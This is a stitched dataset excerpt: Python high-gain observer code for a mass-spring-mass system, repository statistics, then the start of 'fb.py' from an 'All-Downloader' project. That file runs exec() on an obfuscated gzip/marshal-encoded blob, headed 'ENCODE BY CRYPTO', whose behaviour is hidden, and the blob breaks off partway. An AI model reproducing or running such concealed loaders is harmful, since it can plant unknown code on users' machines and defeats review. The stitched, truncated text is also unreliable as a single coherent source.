np.dot(B, reshape_pt1_tonormal(mean))
LC1 = reshape_pt1(Gamma1 * (y - xhat[:, 0]))
xhatdot = reshape_pt1(ABmult + LC1 + u)
gdot = reshape_pt1(adaptation_law(g=g, y=y, yhat=reshape_pt1(xhat[:, 0]),
kwargs=kwargs.get('prior_kwargs').get(
'observer_gains')))
# Also check eigenvalues of M for stability without high gain
K = np.array([[k1, k2]])
C = np.zeros_like(xhat)
C[0, 0] = 1
M = A - np.dot(K.T, C)
eigvals = np.linalg.eigvals(M)
for x in eigvals:
if np.linalg.norm(np.real(x)) < 1e-5:
logging.warning('The eigenvalues of the matrix M are dangerously '
'small, low robustness of the observer! Increase '
'the gains.')
elif np.real(x) > 0:
logging.warning('Some of the eigenvalues of the matrix M are '
'positive. Change the gains to get a Hurwitz '
'matrix.')
return reshape_pt1(np.concatenate((xhatdot, gdot), axis=1))
# High gain extended observer from Michelangelo for the mass-spring-mass system
# Using current GP estimation of dynamics for xi_dot, high gain observer
# from Michelangelo's paper, extended with extra state variable xi
def MSM_observer_Michelangelo_GP(t, xhat, u, y, t0, init_control, GP, kwargs):
x = reshape_pt1(xhat)
assert np.any(kwargs.get('saturation')), 'Need to define a saturation ' \
'value to use the combined ' \
'observer-identifier framework.'
xhat = reshape_pt1(x[:, :-1])
xi = reshape_pt1(x[:, -1])
y = reshape_pt1(y(t, kwargs))
u = reshape_pt1(u(t, kwargs, t0, init_control))
# Gain (needs to be large enough)
g = kwargs.get('prior_kwargs').get('observer_gains').get('g')
k1 = kwargs.get('prior_kwargs').get('observer_gains').get('k1')
k2 = kwargs.get('prior_kwargs').get('observer_gains').get('k2')
k3 = kwargs.get('prior_kwargs').get('observer_gains').get('k3')
k4 = kwargs.get('prior_kwargs').get('observer_gains').get('k4')
k5 = kwargs.get('prior_kwargs').get('observer_gains').get('k5')
Gamma1 = reshape_pt1([k1 * g, k2 * g ** 2, k3 * g ** 3, k4 * g ** 4])
Gamma2 = reshape_pt1([k5 * g ** 5])
if GP:
if 'GP' in GP.__class__.__name__:
mean_deriv, var_deriv, lowconf_deriv, uppconf_deriv = \
GP.predict_deriv(reshape_pt1(xhat), reshape_pt1(u), only_x=True)
else:
mean_deriv = GP(reshape_pt1(xhat), reshape_pt1(u),
kwargs.get('prior_kwargs'))
else:
mean_deriv = np.zeros_like(xhat)
if np.any(kwargs.get('saturation')):
# Saturate the derivative of the nonlinearity estimate to guarantee
# contraction
a_min = np.min([-kwargs.get('saturation')])
a_max = np.max([kwargs.get('saturation')])
mean_deriv = np.clip(mean_deriv, a_min=a_min, a_max=a_max)
A = np.eye(xhat.shape[1], k=1)
B = np.zeros((xhat.shape[1], 1))
B[-1] = 1
ABmult = np.dot(A, reshape_pt1_tonormal(xhat)) + \
np.dot(B, reshape_pt1_tonormal(xi))
DfA = reshape_pt1(np.dot(reshape_pt1_tonormal(mean_deriv),
reshape_pt1_tonormal(ABmult)))
LC1 = reshape_pt1(Gamma1 * (y - xhat[:, 0]))
LC2 = reshape_pt1(Gamma2 * (y - xhat[:, 0]))
xhatdot = reshape_pt1(ABmult + LC1)
xidot = reshape_pt1(DfA + LC2)
# Also check eigenvalues of M for stability without high gain
AB = np.concatenate((A, B), axis=1)
ABO = np.concatenate((AB, np.zeros_like(reshape_pt1(AB[0]))), axis=0)
K = np.array([[k1, k2, k3, k4, k5]])
C = np.zeros_like(x)
C[0, 0] = 1
M = ABO - np.dot(K.T, C)
eigvals = np.linalg.eigvals(M)
for x in eigvals:
if np.linalg.norm(np.real(x)) < 1e-5:
logging.warning('The eigenvalues of the matrix M are dangerously '
'small, low robustness of the observer! Increase '
'the gains.')
elif np.real(x) > 0:
logging.warning('Some of the eigenvalues of the matrix M are '
'positive. Change the gains to get a Hurwitz '
'matrix.')
return np.concatenate((xhatdot, xidot), axis=1)
# High gain observer for the mass-spring-mass system
# Using current GP estimation of velocity for xdot, regular high gain
# observer but with GP only predicting velocity
def MSM_justvelocity_observer_highgain_GP(t, xhat, u, y, t0, init_control,
GP, kwargs):
assert np.any(kwargs.get('saturation')), 'Need to define a saturation ' \
'value to use the combined ' \
'observer-identifier framework.'
xhat = reshape_pt1(xhat)
y = reshape_pt1(y(t, kwargs))
u = reshape_pt1(u(t, kwargs, t0, init_control))
# Gain (needs to be large enough)
g = kwargs.get('prior_kwargs').get('observer_gains').get('g')
k1 = kwargs.get('prior_kwargs').get('observer_gains').get('k1')
k2 = kwargs.get('prior_kwargs').get('observer_gains').get('k2')
k3 = kwargs.get('prior_kwargs').get('observer_gains').get('k3')
k4 = kwargs.get('prior_kwargs').get('observer_gains').get('k4')
Gamma1 = reshape_pt1([k1 * g, k2 * g ** 2, k3 * g ** 3, k4 * g ** 4])
if GP:
if 'GP' in GP.__class__.__name__:
mean, var, lowconf, uppconf = GP.predict(reshape_pt1(xhat),
reshape_pt1(u))
if not kwargs.get('continuous_model'):
# discrete model so need to differentiate it in continuous obs
mean = (mean - reshape_pt1(xhat[:, -1])) / GP.prior_kwargs.get(
'dt') # TODO better than Euler?
else:
mean = GP(reshape_pt1(xhat), reshape_pt1(u), kwargs.get(
'prior_kwargs'))
else:
mean = np.zeros_like(reshape_pt1(xhat[:, -1]))
if np.any(kwargs.get('saturation')):
# Saturate the estimate of the nonlinearity to guarantee contraction
a_min = np.min([kwargs.get('saturation')])
a_max = np.max([kwargs.get('saturation')])
mean = np.clip(mean, a_min=a_min, a_max=a_max)
A = reshape_pt1([[0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1], [0, 0, 0, 0]])
B = reshape_pt1([[0], [0], [0], [1]])
ABmult = np.dot(A, reshape_pt1_tonormal(xhat)) + \
np.dot(B, reshape_pt1_tonormal(mean))
LC1 = reshape_pt1(Gamma1 * (y - xhat[:, 0]))
xhatdot = reshape_pt1(ABmult + LC1)
# Also check eigenvalues of M for stability without high gain
K = np.array([[k1, k2, k3, k4]])
C = np.zeros_like(xhat)
C[0, 0] = 1
M = A - np.dot(K.T, C)
eigvals = np.linalg.eigvals(M)
for x in eigvals:
if np.linalg.norm(np.real(x)) < 1e-5:
logging.warning('The eigenvalues of the matrix M are dangerously '
'small, low robustness of the observer! Increase '
'the gains.')
elif np.real(x) > 0:
logging.warning('Some of the eigenvalues of the matrix M are '
'positive. Change the gains to get a Hurwitz '
'matrix.')
return reshape_pt1(xhatdot)
# High gain observer for the mass-spring-mass system
# Using current GP estimation of velocity for xdot, regular high gain
# observer but with GP only predicting velocity and with gain following a
# dynamical adaptation law
def MSM_justvelocity_observer_adaptive_highgain_GP(t, xhat, u, y, t0,
init_control, GP, kwargs):
x = reshape_pt1(xhat)
assert np.any(kwargs.get('saturation')), 'Need to define a saturation ' \
'value to use the combined ' \
'observer-identifier framework.'
xhat = reshape_pt1(x[:, :-1])
g = float(x[:, -1])
y = reshape_pt1(y(t, kwargs))
u = reshape_pt1(u(t, kwargs, t0, init_control))
adaptation_law = \
kwargs.get('prior_kwargs').get('observer_gains').get('adaptation_law')
# Gain (needs to be large enough)
k1 = kwargs.get('prior_kwargs').get('observer_gains').get('k1')
k2 = kwargs.get('prior_kwargs').get('observer_gains').get('k2')
k3 = kwargs.get('prior_kwargs').get('observer_gains').get('k3')
k4 = kwargs.get('prior_kwargs').get('observer_gains').get('k4')
Gamma1 = reshape_pt1([k1 * g, k2 * g ** 2, k3 * g ** 3, k4 * g ** 4])
if GP:
if 'GP' in GP.__class__.__name__:
mean, var, lowconf, uppconf = GP.predict(reshape_pt1(xhat),
reshape_pt1(u))
if not kwargs.get('continuous_model'):
# discrete model so need to differentiate it in continuous obs
mean = (mean - reshape_pt1(xhat[:, -1])) / GP.prior_kwargs.get(
'dt') # TODO better than Euler?
else:
mean = GP(reshape_pt1(xhat), reshape_pt1(u), kwargs.get(
'prior_kwargs'))
else:
mean = np.zeros_like(reshape_pt1(xhat[:, -1]))
if np.any(kwargs.get('saturation')):
# Saturate the estimate of the nonlinearity to guarantee contraction
a_min = np.min([-kwargs.get('saturation')])
a_max = np.max([kwargs.get('saturation')])
mean = np.clip(mean, a_min=a_min, a_max=a_max)
A = reshape_pt1([[0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1], [0, 0, 0, 0]])
B = reshape_pt1([[0], [0], [0], [1]])
ABmult = np.dot(A, reshape_pt1_tonormal(xhat)) + \
np.dot(B, reshape_pt1_tonormal(mean))
LC1 = reshape_pt1(Gamma1 * (y - xhat[:, 0]))
xhatdot = reshape_pt1(ABmult + LC1)
gdot = reshape_pt1(adaptation_law(g=g, y=y, yhat=reshape_pt1(xhat[:, 0]),
kwargs=kwargs.get('prior_kwargs').get(
'observer_gains')))
# Also check eigenvalues of M for stability without high gain
K = np.array([[k1, k2, k3, k4]])
C = np.zeros_like(xhat)
C[0, 0] = 1
M = A - np.dot(K.T, C)
eigvals = np.linalg.eigvals(M)
for x in eigvals:
if np.linalg.norm(np.real(x)) < 1e-5:
logging.warning('The eigenvalues of the matrix M are dangerously '
'small, low robustness of the observer! Increase '
'the gains.')
elif np.real(x) > 0:
logging.warning('Some of the eigenvalues of the matrix M are '
'positive. Change the gains to get a Hurwitz '
'matrix.')
return reshape_pt1(np.concatenate((xhatdot, gdot), axis=1))
# Functions for observing experimental data from full data
def dim1_observe_data(xtraj):
return reshape_dim1(xtraj[:, 0])
| 46.441618
| 80
| 0.564
| 5,394
| 40,172
| 4.05914
| 0.050983
| 0.114181
| 0.035168
| 0.05024
| 0.93647
| 0.934049
| 0.932816
| 0.928431
| 0.922083
| 0.913953
| 0
| 0.031445
| 0.304142
| 40,172
| 864
| 81
| 46.49537
| 0.751807
| 0.154063
| 0
| 0.882526
| 0
| 0
| 0.145482
| 0.00062
| 0
| 0
| 0
| 0.001157
| 0.014684
| 1
| 0.0279
| false
| 0
| 0.005874
| 0.001468
| 0.061674
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
854cee6eea04177eadb880318bb1ef5c5cb7d5c9
| 185,407
|
py
|
Python
|
bin/temp/var/usd/cd/tmp/usd/data/data/data/data/data/temp/fb.py
|
RazorKenway/All-Downloader
|
e1c6d9ee277166faff8876e967b521fd752f0e7f
|
[
"MIT"
] | 44
|
2021-06-28T15:57:18.000Z
|
2022-03-22T07:36:13.000Z
|
bin/temp/var/usd/cd/tmp/usd/data/data/data/data/data/temp/fb.py
|
RazorKenway/All-Downloader
|
e1c6d9ee277166faff8876e967b521fd752f0e7f
|
[
"MIT"
] | 1
|
2021-11-26T13:28:10.000Z
|
2022-01-10T21:23:41.000Z
|
bin/temp/var/usd/cd/tmp/usd/data/data/data/data/data/temp/fb.py
|
RazorKenway/All-Downloader
|
e1c6d9ee277166faff8876e967b521fd752f0e7f
|
[
"MIT"
] | 5
|
2021-08-23T17:34:56.000Z
|
2022-02-25T19:23:59.000Z
|
#ENCODE BY CRYPTO
#YOU CAN TRY THIS DECODE GOD BLESS
import gzip,marshal,zlib,base64,binascii,lzma
try:
exec(gzip.decompress(marshal.loads(b's\x8a\xfc\x00\x00\x1f\x8b\x08\x00\x83\x83\x98a\x02\xff|]\xd9Z\x14M\xb0\xbc?O!(\xa8\x80\xd05\xbd\x8b\x1b .\x80\x88\x8a\xca2"\xdd\xd5\xdd\x8a\xec\x8b\n*>\xfb\x99\x88\x8cr\xfe\x8b\xf3\x9d\x0b\x17`\x98\xe9\xae\xce\xca\xca\x8c\x8c\x8c\xdc;<9>\xbb\xb8QW\xe7m\x96L\x1dVg\xe7_\xab\x83\xa9z\xef\xa8:\xf7{{S_~\xed\x9dL\xfd:\xd8\xab\xff\xe7\xe2\xec\xea~{\xd9\xfa;z\xcd\xf4\xc1q\xd5\x9c\xdf\xc1\x0b\xa6\x9b\xd6\x1f\x1f\x9e\x9c\xb5\xe7\xe7w\xea\xdb\xfdK\xd7\xf5/\x8b\xba\x7f\x19\x15\x83?\xd1\xe0\xff\xb1\xfd)\x8bj\xf0\x8d^\xff\xb2\xeb\xfa\xfd\xc1\x97\xc9\xbb\xc1_\xd1t\xff\xa8\x7fY\xf9\xc1\x9f\x94?\xb9\xac\xb3\xc3\xfeeS\xff\xbf\xffi\xaa\x7f\xdf\xf9\xa1\xff4\x837\xab\xcf\xfb\x97m6\xf8F;\xf8"\x1f\xbce\xf9rl\xf0\xa6\xe5\xdb\xc1\x97x\xf7\x14\x1f8\xb8\x98\xfc\xbd\x1b\\\xc9\xe0O7\xf8\xdc\xbc\xd3\xff\x9b\xcf\xfd\x8b\xc1?\xed\xc7i{\x87\xaeK\x07WXDw\xf1[\xf7\x9e\x0c\xbeQ\xf3\xd5\x83\x17UI\xffl\xf0u\xf2x\xf0\xab\xc9\xe0\xd5\x83\xcf\x8c2\xfc\xae\xee\xbe\xf7\xd5n\x19\xef\x1fus\x83\xcbK\xe7\xec\x1a\xdb\xc1\'\xf9\xc1w}d\xff\x16\x11\xee\xdf\xe3\xbb\xcd\x93\xfe\xd1\xc8\xca\xe0[\xce\xd6\xaf\xc0\xa5V\xf8w^_D\xb6\xa0\xae\xc2\xc5\x1d\xbe\xb7\xaf*~7~1\xb3s\x03/\x19\\\x86\x1b\\\x92\x8b\xec3\\m\xef\x1ey\xac\x9a\xfd\xcc\'\xf8zb\xf0W\xbe\x8bO/\xf1\\\x06\xcb\xd5\r\x9eM\xdd\xd9\xfbW\r>c\x1d\xbf\xb4v\x7f\r\xff\xffh\x0b\x80\x17\x94\xb1\xfd\x02\x16\x13\xff\xdaM\xb4\xde\xde\xa2\xebvn\x0e\xbe\xc2\x8b\x9br\xf0\x82ZW\x8d+J\x9e\xc0\x04\xe6\xe7\x07/+\x1a\xbb\xa3\xbc\xfb>\xfbt\xf0\xe3\xc1\xb7\x1c\xae\xc4\xd5\x1b\x83O)\xed\xb1\xb6\r\x9e\xb1\x19F\xd3\xfd\xb1\x05\xc1s\xc4\x0f\xf1\xcdv\xf0\xffv\xf0b?\xf8S\xba\x9d\xc1\x0fz\xcb\x83\xbf\xe2|q\xf0\xbd\xd8\x1eO7\xf8Y\x87\x85\x84\r4\xb3\xf6\xb1\xdd\xc0:}k\xf7\xc07\xcbo.\x0c^\xde\xde\xc0\x13kp__\xf1\t\xcf\xf0\x16\xdf\xb4>\xad}>\xee\xa4\xc1\xe5\xa6z\xe4\xbd\xc1\x7f\xaa\x1e\xae\x10\xbf2j\xaf\xf2\xb8G=i\xda\xf7\xe0)T-\x9e\x17\xac\xa5\xd7\xad\xcd\xc2\xeef\xed\x01\xc2<\x8bB\x8bR\xd8/\x96\x85\xfe\x8f?z\xf7hpKMj\xa6\x83E\xf5\xc5`A\xabj\r\xeb\x8f[\xf5\xbd\'\x17o\xf9\x0f\xdec\x07?\x1b<\xc3\xaax610\xe5.{r\xe7\xa5-EW\x7f\x9e\x84\xdd~\xc6]L\x8e\xecc\xf1d\xbb\x0e\x1b\xe9\xf3\xb8\x0c7\xea\xb4\\\x89\xdd\x11\xfem\xbb_\xd8\xc0\xb8\x99\xa2\xbegk\x83\x8biqA]\xffh`Yma\x7f\\\xb1:x\x80\xc9\xda\r\xbb\xfc&6K\x1c\xdc\xcemX\xc6\xc7\x9b\xe1\xfb\xbf\x07\xaf\x1f\xfc\xb0\xc6\xbe\xc33\xafq\xa3\x83\xf7\xads\xdbEnpY\r>\xa32#\xc3\xe5\xf2\xf9g\xb3\xb8\xb1YX\xc0\xb6=\x12<U\xd8\x0cL\x02;\xb3M^\xe1\xc1\xc2\x98\xfe\xd8\xaa6\x91m\xfb\x92\x17}\x8d;\xda\xe5\xe7\x0e\xee\n\x1f\x1cux6\xe9}\xfc\x05_p\xdd[]\xb3\x0b\xc7\xe3n\xaa\x85\xf0U\xf9\xed\x066]\xf5\xe3p\x84\xff~\xc7\x13\x1c\xecK_\xeb\x91\x0e.\xa1\xca\xe11\x9an\x99n\x83\xdfj\xda\xc1\x17e&k\xf2r\x95\\\xe9\xe7\x83\xbf\x12\xfb\xe5\xb2y0\xb82,2\\Yf\x0f\xb8l\xcc[\x95\xcd\x9b\xd6\xac\x1fw\x16\xe5\xad=\x06\xef_\x98\x81D\xbd\xd6\x8c\xb4\xa2m\x1e\xe2\xbdGi\xa5\xb8GlGZz\xd2\xef\x7f\xb1-\x8ak\xe3vu?\xcc\xdc\xe0\xa9\xf1\xa9]^\xda\xba\xe2\x11\xe3\xc3\xf0\xc3*6\xb3h;\xf3|U\xfbC\xce\xca\xfcG\xff\xc6\xc8\xd3\x137R\x99\xc3\x8b\xdc\x8a\xd9\x7f\x11}\xef\x8d\xbd\xb3\x0f\xc2\x0f\xdaj\n\x1f0\xb8\xa2\xca\xf6:\xde\xbb\xec\xccU\xd6\xe5=[\x0c8c\x18G\x87\xfb\xc6\x0b\x12l\x9a\xc6\x0c\x04^\xa7\xf4\xf6\xafk\xec\x9d`\xa4\xb0N\xbcK\x07W\x82m\xe3\xabw\xe6\x94\xeb\xee\xf7\xf5=:\xb3#\xbb\x91\x8a\xa7\xc0\x9d~\xbfZ\x82Y\xfa|\xcfl\xcbG3\xb6V\xb5\x1c)\xf6F\x83\xf7\xc4\xf7\x921<\xcc\xbf\x83\x9fdx\xc5\x92\xb9E\xd8\'\x8e\x1e|\xb3\xc9?\x0c\xbe\x91\xbf\x85Q\\\xfe\xb1\x8d\xee\xaa\x81\x97i\n\xf9\xcd\xf4\x19\xfe\x1al\x91"\xd3\x1f8\x8d\xd6n\xd5\xf1Un\x0f\xde\xbf\x9a\xbf\xbb\xa5c\xaa\x98\x1f1\xff\xe8\x8bg\xe3\xb6@\x9e\x8e}\xd9\xcc\xc6Goy\x85\xfd1}\x9d\xda\nF\xfe>.\xeb&\x96\xeb\xd4\x0e\x01l*\x9c\x970\xb2\xca?\x1e\xfcB\xe37\x0f\xec\xfb\xae\xaa^\xf7o\x0f>\xbbl\xed\xf7k\xc7\xd3\xa3\xbfW\x0e\x16\xa9o\x1b\xc0\xce\x1f\x18V\x14\r\x9cd\xed\xf1\xb2\'\xf7\xed\x08ip\xa8E\x13p?\x83o\xe0Q\xd5\xf6\x1c\xab\xcc\x96\xb4h\xdf\r\xbfY\xf8e\xdb\x98.\x1e13\xaa\xe5\x13\xdb\xfc\xf9=\xb3\xcf\x1a\xfb\'zx&SK\xf1\xb4\\\xb2\x81]\x1d=\x84_\xfe\x89\x1d:\'g\x06\xef\x1c\xcf\xe0/\xb3S\xf8\xbd\x861\x80o\xcc;5\xb8\x8a\xc8\xcd%K\xf0\x12f\x92UN\x1fp\xdbN\xa4.\x87\xfb\xc4\x96M\xf66\x0f\xed\x9e\xaa\xe6uLG7x\xdd\xeb{\xab\x08@\xb2\xe7X\xa7\x9bX\xdfy\xf9\xc2\xd8\x1c\x19\xec\x15\xd6\x87?\xa5\x1f\x1f\xc5\tZ}\xb1\xdd\xe5:,\xbc\xabnu\xda\x1d\xd9\xfcC\xf3\xa2U7\xf7\xe7\x06\xdem\xec\xc7\x17<hs<\xd8\xfb\x1d6[\xef\xf3#\x9cz7\xddW;\xfc:\x7f\xf9\xdc\x1e\x88\xaf\x1e\xca\xebp%\xed\x96j\xbf\x8a \x00\x8b\x08#No\xda\x8e\x0f\x97\x08\xc7\x83GR)\x98h\x11\x064\xa7\xb6!\xb1\x19\x8bd\xd2\x0eQ\x9c\xfdtF\xf9\xfc\xe0\x93\xeb\xc2\xcc\xbc+\xa6p\xc5\'\xa5\xb6B\xc6\x8b\xbb\xb0\xc3\x0c\x8b\x8e\xa5\x86[u\xcd\xb1\xf6N\xda\xd8\xc7\xe3D\xa9*\x1dix\xb8~\t\xcea\xc1<D\x11\x1c\x0e\x16\xbdwe\xbe\xdb\xf7\xb6c\x0bc\n\x05\x16U1\xa5_h\xa2M\xbb\x9d\xa6\x9d\xc7W\xcd[\xf3\x0bx\xa3\xd2\xbd{\xab\x80\x0c\xc7wt\xeb\xad\x059\xf6U\xf2\xd6\xec-\x8a&\x9f\xdf{\x96\xda\x1e.\xfd\xb3\xf7f\xb98n\xab\x1c\x8f(y/\x9f\x04\xeb\xaao\x8c(b\xea\xec7\xb0\xfb+\x9d\x94\xde\xbd\xb1\x97\xf2\xe5\xc5c3DX\x1c\xdcU!\x87\r\xb3\x8b\x1cB\xcc\x1e\xe2\x86r\xcc\x1e[\xdd3\xdbG\xe8\xe6\xe2\xdcn\x18\xdb\x1f\x87\x1b>\x81..\xc2QS\xac\xdb=\xd7\xfa(\xfc\x84\x8f\xb7\xb0\xd33\x8a~\xc1\xa7-\xdbO\x1d\xcc\xa5~\xbd\x85\xb32\x1fXDY\xce\xc3E\\}\xb8+C\xe8\xechd0\x97_\xe1\x9c\xc8\xcd\xc1 \xc0\x89\x92\'\xd1\xf5\x19\xde\xe5\x86\xddl\xde=\xfc6\xb9o&\xdad\xd7\xb6\xf1\xe91\xdc0\xd6\xf4t\x0b8\x02\xaa\x89\xcd\xf5~\xff\x11\xf7c\x1f\xde\x06G\x1f\x1e\xf9\xc0\xfb\x0e\\\xf1Os\xe1%\x8e5\x97\xe0#\xd2y[\x0f\\\x006\x0b\x8f@x\xfa\xf4\x9e\xdd\xa9\x8b_\xe1\xaf\xe3\xab\xfe\xd9\x1eb\xf2(\xf9\xf8\xc4.\xad\xf0?`\xfa\x1b\x17\x9b\xb6k\xe0\xc0;\xf7\xd6~\r\x96\xd4Eo\xcc\xe9\xc2\xd1\xf2)\x96Z\xbd\xce\xbe\xc6:p\xdf\xf1x9\xb6\xb3\xd4\xf5\xec*\x9c\x0ee\xd7j\x83\xd68\xca/\xed\xe4\xc0n/\xaa\x07\x8a\x98\xb1O\xeaI<k\xee\xb2\xafvH\x15\xbc\x84\x89\xad\x1b0\x8f\xe8\xbb\xf9~\x97\x14\xdc\xbfg/\xed\x8d\x10\xeaD\xdd\xf7\xb5\xd7v\xc9\xd8E5\x9em7e\x11,\xdcK\x8bc\x06\x87(\\A%w\x8e\xed\xea\xe2f\xf2\x0f\x0c\xe1\xafYh\x93|\x9f\xbb!w\x96Ma\x11\xbb\x9b\xab\n\xcaz\xb6U\xebd\xd3v1\x16\x1c\xc7kQ\xdd\xb38\xa9\xab\xc6/\x14\x92\xc1?$?\xc7F\x1e\x9akGZ\x81 \x17\xc1;\xfe\xe0\x84,\xda)sHe9x\x95\xcfl\xe7\xb5\xe5\xecC\xbc\xd3\x84\x1d1]o\x04Qz~\x99\x1f\xca\xd3G\n\xf2\xb8Q\xbe]O(\x17q\'x\xc7\x1b\xe3X\xb8JG{a\xf7\x88\xcf\xa8\x14\x90\x94X\x99\\\xff\xcf\xec\xe4\xc3\x8d\x95\x08\xc7p\xe6v!\x0c\xc7\x06O\x0f\xee=\xc5Zaa\x8ag8=\x16,\xb4\xc7\xafp#\x157\x19\xf9l\xdc3S\xc0\x96\xc5\xcfkx\xd1\xae\xdd1\xc3\xc0\xb6\xc7\x85TJ\xa2\x9c\xeb\xca\x85\x07\xb0\xbc\xfb\xb0\xfc\x07OF\xb5\x15;%\x0e\xa5\xad\x16O\xb8*\xfcQ\x96\x06\x97\x867\xf3\xf1\x0bX\xda\x91\x99[\x1d\xdd\xb9\xa5\'\x1c+\xb9\xc5\xe3+\xf2\rE\x8d8\xba\x8a/\xf7\xf0\xeau>\xfb\x0f\xf6T\xb0\x11\xab\xf4.~\xc7Y\x9c\x16\xd54\xac5\xb8\xfe\xf2\xa9\x9dv\xf4\xfb\xedG\\\x06\x0c)~cfUd\xfb\x9d\x1el\xb4\xfc\x1c\xbb,\xbfkvaY-\xa2\xea2?7\xd3\x82\xe9\xd1\x89\xe3\x11\xb4\xa7x.\xf3\xfd\xdb_\x82{U0\x03\xe3\xaa\x93\xed-3\xe2\xda]\xc3\x187a\x02\xf6\x02<8W\x7f\x80\x17\xb8\xf3\x86\x9fk\xc9\xde\xc0\xe9\x9d}\xdf{\x06\x17\x8d\x0f-\xedy`\xd7\x95\xf0\xc7\r#g\x9c\xce\xd9\xf2ke1\x9d\xed\xcc"\xff\xfd\xd3\xde\xbf(_\xd8\xda"t\xa8\x8b\x18\x8f\xc0\x8fl\xd9\xdb\xf9\xe8\xdcL\xaa\xaa\x91\x90\xf5\xa2\x91\xa7\x87\xf6\xb8\xda\xe2\xd7G\xac\xc5k\x8b\xb9\xaab\xdc\xd6\xdc\xf7\xb6\x14\x03$?\xb1\xb3\xf0\x1a|.\x83,\xe5-y\x97\xce\xd8\xff\xe8\xca\xb3\xc2\x0e\xe0NarWn\xccc\xf5\x1f\xbe\x1e\xf9b\xef\xe5\xf4\xa7\xd6\tW\xc7\xdfO\xde\xd7fy\xb8\x872\xdd\xc4\x9d\xca\xc1U\xca\xc4\xeb\xee\xa1mJ\x17\xcf\x8f\xda)\x83\xc5t\xf1\x06\xa2\xbb%\xac\xda\xa1\xd9\x026\x08<\x8a\xcb\x91.\xa6\xa3\xb63+\xa6mWv\xd6#i\xaa\xb3\xb7\n"2\xa5k\xf0\xc0\xf19\x8d\xf3\x81\xc2\xbcT{/\r\x01\xfc9\xde\xe0\xa5\xedX\x04\t\xbe\x19\x17Z\xd0\xe93\xd2q=\xeaj\xfc\xa9\x9ddD&"%\t\x91\xb9\x0e8\xd7\x96g\xe8\xab/\xf8\xc5\x1bJ\x00\xe5\x94\t\x84d\xe6\xfd\xa2\xe4\xaf"n8\x8f\xfa\xad\xed]\xc2\x1bnQy\x7f\xef\xd6(v\xd0\x8b\xd7\x8d=\n\xe7\xb6dh\xa9\xa5w.\xdax\x84g\x99?\xb3\r\x8c;*\x0c\xccA2\x80\xd3\xb3s\xcf\x91L\xdd\xb4\x8c\n\x17\xc9\xac\xa0\x9b\xb7\xfdI\xa7\x97\x1d \xb4\xfa`\xa9\'N1\x9c\x01t\xfd\xbd\xab\r\xf9,$\xd4x\xce\x08\xac\xbap\xd8\xb8_3?d\x1dm\x81\x8c\xbd\xf8\xa5\xf0\xc2u\xd3\x7fW\xf4\xabLV\x18\xc1\xe2\xb9\xa4\xdbv\xb4\xc0\x1f\xe0\xacg|^\tD\xf1J4\xe1\x96\xcb\x1d\xfc`\xf4%\xb6\xea]\xff\x07w\xfd\xdd.\xb1\x8e\x8e^\xff=\xc1jm>P^$\xcf\xc4\xf3\xa0^\xc5kW\xf5\xd6x\x9c\xd9/K\xcf\xdbb\x1b\x0b\x88\x08\xae=C\xde\x80(\xa1\x0e\x0f\x93\xe8[e+\xe0\xe3\xfe\xd9\xd5o\x99n\xfd\xdb\x9e\x9d\xe3^\x84\x0bH>\xda\x93\xc5\x06,C\x8a\x8fM\x14\xb2C\xe05U\x8e4&\x19\xb1\xe8\xa7\x10~\xe0\x93?krf\x06\x7f1\x95\xc3\xafe\xcd\xd9\x82\x10\xb0\xd6\xfcX\xdd\xabob\xc3\x9d\xdcy\x98\xed?\xfcj\xbb\x8b.C\xf1U\x19\xef\xca\x8d\xd3M_\xdbfB\xea\xc4\x00\xd8\xd9\xd2\xe6\xf2(.\xdd\xf9\x83[\xfb\x887\xf9)H\x07W^\xfeD\x16\xd1{cW\x8a\xb7\xf0\xf9\xf8\x95l\xcdb\xc8\xfe\xfb\xf0%\xcfa\xec\xa7t\xea\x83\xd9D\x97]\x10Uq\xb5\x05\x19};\x0e];\xbe\xfb\xa4\xb2\x8d\x8a\x07S\xb8s[\xa0::yi\x0f\x9fY)\x8e\xbbF9S\xf5\x06\xb1\xcc&\xd6\xe6Dy\x1a]\xf4w\x8b\xa5p\xb5-\x9c\x08\xf2\t<^\xbb-\xace\x9c\x85\xf8\x19\x98\x05\x1eLSl\xd8\xcd O+\x9a\xa78Yz\x8f\xc3&\xb8\xdb\xb3G\x88x\xb7\xf1\x0f\xbf\xd9\x1a"\xac#\xac&\xbc\x0cA\x03\xe3y\xa6f\xf1\xa6\x99w\x95{\xf3av\xa4\x1c(\xb5F\\\x9b\xe2\x89U\x11b\xc2|\x1d;\xc1\x03\xc1q\x8f,F\x825V8;\xe0\x87\xa2z\x02f\xfe\x13w\x83\xfc\xb5\xfc$\x9c\xa0\xd2\xf1\xach\x98\xa1\x9ar"\xf88W\xcc\xbc:\xd5\xa5\xb6\x8f\x81\xf0\r\x02\x81\xdb\x80\xfc\x9a\x85r\xd7 A\x0f\x00\xcd.\x15\x17\xbf\x84\x07\xb7\xf3\xce"\xc9\xb6\xfc\xb1\x8d\x1b\xcfn\rS\xd82\x1b=5c)q\xd8\xe0\xbd\xf1\x8ca\xca\xbc$\xfd1l\xa3T0\x91\x99\xf7\x8a\xdc\xde\x87\xed\x0f\n%\xf3\xa7BWB\xdcP\xbd:\xc6y\xf9\xd2b\x1a\x82\xc3\xc0s\xcb\x1d\xa7\xe4=Z\xd8\x94\x17-p|\xe63\xbf\xcd\xa1\xc2\x1e\x9a|{N\xe1o"\xd7\xc6\x84v\xc5r\x06l\xbb\xba(\xe7\xfe\xfeRv\x1e/+8\xf5\xe6L\x9al\xff\xd1\x05v\xf4\xa5\x9d\xf3\xf8\xf8&\xf8\xf5\xea\xc4l\x13oO\x185y\xb0\xf2wS\x01A\x99\xc7?\xec\x1a\x802\xb0\x06\xd0n\x19\xdeB 